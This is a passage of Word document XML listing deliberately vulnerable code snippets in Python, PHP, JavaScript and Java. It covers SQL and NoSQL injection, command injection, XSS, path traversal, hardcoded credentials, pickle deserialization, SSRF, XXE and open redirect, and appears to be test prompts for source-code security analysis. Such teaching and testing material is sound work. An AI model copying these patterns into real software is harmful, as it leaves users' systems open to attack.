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EB2D" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00000000" w:rsidP="00267103">
      <w:r>
        <w:pict w14:anchorId="4C82BAE5">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B42EBF3" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🟢</w:t>
      </w:r>
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> PHẦN 1: 20 ĐOẠN CODE (Source Code Analysis)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21629183" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Copy từng đoạn dưới đây và paste vào terminal, nhấn Enter 2 lần.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7505F6" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. SQL Injection (Python - Basic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D72911F" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F363B89" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E96D88D" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFE74A3" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    username = request.form['username']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCD5BC5" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>query = "SELECT * FROM users WHERE name = '" + username + "'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00466425" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>cursor.execute(query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277C8F2C" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708D5982" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Command Injection (Python - Ping)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AFC63C" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6754EF4B" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406D080F" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DAEBEF" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369A0A6A" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>target = request.args.get('target')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8E4F23" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>os.system("ping -c 1 " + target)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447EC842" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED55DF3" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Reflected XSS (PHP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A82022D" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189A5C74" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D99B64" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2B2F95" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    $name = $_GET['name'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CD4278" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>echo "&lt;h1&gt;Welcome " . $name . "&lt;/h1&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377BB92E" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207BED68" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4. Path Traversal (Node.js)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4F8480" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9AF48B" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A474BB" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551EE3B4" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    app.get('/download', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D124BF5" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  const filename = req.query.file;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F8A821" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  res.sendFile('/var/www/files/' + filename);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B56E7B0" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7002FB6A" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D73FF5A" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Hardcoded Credentials (Python)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261804A0" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02763B4E" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCDD643" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA18149" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    def connect_db():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E9C028" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    return mysql.connector.connect(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7D5F45" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">        host="localhost",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BCE8BC" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">        user="admin",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753938DA" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">        password="Password123!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F470B1E" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5382448E" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478CE070" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Insecure Deserialization (Python - Pickle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028B1543" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBB6663" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C539C8A" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA929EF" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    import pickle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABA7A75" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>data = request.cookies.get('session_data')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF8C307" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:lastRenderedPageBreak/>
        <w:t>user_obj = pickle.loads(base64.b64decode(data))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685ECC4A" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D0308A" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. SSRF (Python - Requests)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E2E910" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2413D6DE" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2826C423" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723F431C" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFE858D" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>url = request.args.get('url')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62566024" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>response = requests.get(url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B330E7" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>return response.content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4367D001" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A39826" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. XML External Entity - XXE (Java)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F109EDB" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAB021D" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7CED9C" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B45E60" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63956782" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>// Missing feature to disable DTDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B0CFDF" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>DocumentBuilder db = dbf.newDocumentBuilder();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B23A290" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>Document doc = db.parse(new InputSource(new StringReader(xmlInput)));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41202E3A" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9A3E97" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. SQL Injection (PHP - Login)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5FE053" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2DB635" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B3D1DE" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7486F77B" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    $sql = "SELECT * FROM admins WHERE user='" . $user . "' AND pass='" . $pass . "'";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D10E9C" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>$result = $conn-&gt;query($sql);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072A6A4A" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013C56DA" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. DOM XSS (JavaScript)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DCA4FE" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B255CD" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0592814A" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607696A6" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    var search = new URLSearchParams(window.location.search);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407E42EF" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>document.getElementById('content').innerHTML = search.get('q');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DAA27D" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C98832E" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. Open Redirect (Flask)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11ED5986" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59902D0A" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1CBDCA" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A9AA19" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    @app.route('/login')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEF785E" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>def login():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E98E95" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    next_url = request.args.get('next')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0FBB34" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    return redirect(next_url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758D81E5" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BD1D62" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12. NoSQL Injection (Node.js/MongoDB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021D27B9" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>code JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3389A5FF" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>downloadcontent_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B1ED8C" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>expand_less</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF2F065" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    db.collection('users').find({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FD390C" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    "username": req.body.username,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7582397A" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">    "password": req.body.password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE3FF66" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C9AC1F" w14:textId="77777777" w:rsidR="00267103" w:rsidRPr="00267103" w:rsidRDefault="00267103" w:rsidP="00267103">
      <w:r w:rsidRPr="00267103">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
